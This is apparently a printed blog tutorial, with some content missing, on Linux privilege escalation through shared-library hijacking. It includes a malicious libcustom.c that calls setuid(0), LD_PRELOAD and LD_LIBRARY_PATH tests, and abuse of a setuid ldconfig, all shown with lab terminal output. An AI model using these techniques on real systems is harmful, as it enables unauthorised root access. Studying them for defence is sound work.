Professional Documents
Culture Documents
Linux applications often use dynamically linked shared object libraries. These
libraries allow code flexibility but they have their drawbacks… In this article, we will
study the weaknesses of shared libraries and how to exploit them in many different
ways. Each exploit will be illustrated by a concrete example, which should make
you understand how to reproduce it. I’ll give recommendations on how to protect
your system against it in the final part of the article.
Table of Contents
Shared Libraries in short
Dynamic Linking in Linux
Find a vulnerable application
But can we exploit it?
1. Write permissions on /lib or /usr/lib
2. LD_PRELOAD and LD_LIBRARY_PATH
LD_PRELOAD
LD_LIBRARY_PATH
3. Setuid bit on ldconfig
Alternative to /etc/ld.so.conf
How can we defend against this?
Disclaimer
I won’t describe here the full details of how libraries work in Linux, my goal is to
1 of 11 9/8/19, 7:17 PM
Linux Privilege Escalation: Abusing shared libra... https://www.boiteaklou.fr/Abusing-Shared-Libra...
give you the necessary amount of information so you can understand the exploit
and be able to reproduce it.
Static libraries will become part of the application so they will be unalterable once
the compilation done. Every running program has its own copy of the library, which
won’t be interesting for us.
They seem much more attractive because of their dynamic nature. If we manage to
alter the content of a dynamic library, we should be able to control the execution
of the calling program and that’s what we want!
ld is the GNU linker. Its man page gives us the following methods for specifying
the location of dynamic libraries:
2 of 11 9/8/19, 7:17 PM
Linux Privilege Escalation: Abusing shared libra... https://www.boiteaklou.fr/Abusing-Shared-Libra...
3 of 11 9/8/19, 7:17 PM
Linux Privilege Escalation: Abusing shared libra... https://www.boiteaklou.fr/Abusing-Shared-Libra...
The file /usr/bin/myexec has the setuid bit enabled and is owned by root. (By
the way, this specific program caught our attention because it’s the only unknown
program of the list. If you have any doubt on an application, google should help you
find out if it’s a regular linux application or not.)
Is there any chance that /usr/bin/myexec uses shared objects? Let’s check
this with ldd :
We can see libcustom.so, which looks pretty custom (Oh really?). This executable
file gathers all the pre-requisites. However, we still need to find a way to inject our
malicious dynamic library.
For the need of the examples you’ll find below, I’ve created the setuid ELF
executable myexec linked with the dynamic library libcustom.so.
4 of 11 9/8/19, 7:17 PM
Linux Privilege Escalation: Abusing shared libra... https://www.boiteaklou.fr/Abusing-Shared-Libra...
# myexec.c
#include <stdio.h>
#include "libcustom.h"
int main(){
printf("Welcome to my amazing application!\n");
say_hi();
return 0;
}
# libcustom.c
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
void say_hi(){
printf("Hello buddy!\n\n");
}
But also an evil library that we will try to inject in place of the real libcustom.so:
# evil libcustom.c
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
void say_hi(){
setuid(0);
setgid(0);
printf("I'm the bad library\n");
}
This one is only printing a different output but be sure that if we manage to execute
this code, we could obviously pop a shell with system("/bin
/sh",NULL,NULL); .
5 of 11 9/8/19, 7:17 PM
Linux Privilege Escalation: Abusing shared libra... https://www.boiteaklou.fr/Abusing-Shared-Libra...
These variables modify the environment of the current user, but when you execute
a setuid program, it is done in the context of the owner, which hasn’t necessarily
set LD_LIBRARY_PATH or LD_PRELOAD. Let me show you an example.
boiteaklou@LAB-Blog:~/Abusing-Shared-Libraries$ ls -l /usr/bin/myexec
-rwsr-sr-x 1 root root 7376 Nov 18 22:03 /usr/bin/myexec
-rwxr-xr-x 1 root root 7376 Nov 19 20:18 /usr/bin/myexec2
LD_PRELOAD
Using the LD_PRELOAD technique with the evil library on myexec2 (without
setuid bit), we have the following output:
boiteaklou@LAB-Blog:~/Abusing-Shared-Libraries$ LD_PRELOAD=/tmp/evil/libcust
Welcome to my amazing application!
I'm the bad library
boiteaklou@LAB-Blog:~/Abusing-Shared-Libraries$ LD_PRELOAD=/tmp/evil/libcust
Welcome to my amazing application!
6 of 11 9/8/19, 7:17 PM
Linux Privilege Escalation: Abusing shared libra... https://www.boiteaklou.fr/Abusing-Shared-Libra...
Hello buddy!
We can see that it’s working when the setuid bit isn’t enabled for the reasons
explained above.
LD_LIBRARY_PATH
You can see that the libcustom.so linked with these two programs is the evil one.
However, when we run them, we have the following output:
boiteaklou@LAB-Blog:/tmp$ /usr/bin/myexec
Welcome to my amazing application!
Hello buddy!
boiteaklou@LAB-Blog:/tmp$ /usr/bin/myexec2
Welcome to my amazing application!
I'm the bad library
Certain security measures have been put in place to avoid this kind of exploits but
there was a time where it was possible and I think this is a pretty interesting
mechanism to understand.
7 of 11 9/8/19, 7:17 PM
Linux Privilege Escalation: Abusing shared libra... https://www.boiteaklou.fr/Abusing-Shared-Libra...
Inside /etc/ld.so.conf.d/, you can have several files with each of them specifying a
directory to explore when searching for libraries. For example, libc.conf contains
the following:
It won’t be sufficient for our exploit though! We now need to use ldconfig to update
the linker’s cache so that it will be aware of this new evil library. The cache can be
updated with ldconfig without specifying any parameter. However, it has to be
executed as root… This is where the setuid bit comes into play. Let me show you.
boiteaklou@LAB-Blog:~$ ls -l /tmp/
total 12
-rwxrwxr-x 1 boiteaklou boiteaklou 7096 Nov 20 11:01 libcustom.so
8 of 11 9/8/19, 7:17 PM
Linux Privilege Escalation: Abusing shared libra... https://www.boiteaklou.fr/Abusing-Shared-Libra...
boiteaklou@LAB-Blog:~$ ldconfig
boiteaklou@LAB-Blog:~$ ldd /usr/bin/myexec
linux-gate.so.1 => (0xb77c8000)
libcustom.so => /tmp/libcustom.so (0xb77bb000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7605000)
/lib/ld-linux.so.2 (0xb77c9000)
boiteaklou@LAB-Blog:~$ /usr/bin/myexec
Welcome to my amazing application!
I'm the bad library
Alternative to /etc/ld.so.conf
What I just showed you is working, but actually, there’s even simpler. The
configuration file including /tmp is not mandatory since we have the setuid bit set
on ldconfig . Indeed, ldconfig -f allows us to use a different configuration
file from the existing /etc/ld.so.conf.
9 of 11 9/8/19, 7:17 PM
Linux Privilege Escalation: Abusing shared libra... https://www.boiteaklou.fr/Abusing-Shared-Libra...
More generally, ensure that every action performed by users are executed with the
lowest privileges.
BoiteAKlou
10 of 11 9/8/19, 7:17 PM
Linux Privilege Escalation: Abusing shared libra... https://www.boiteaklou.fr/Abusing-Shared-Libra...
Name
11 of 11 9/8/19, 7:17 PM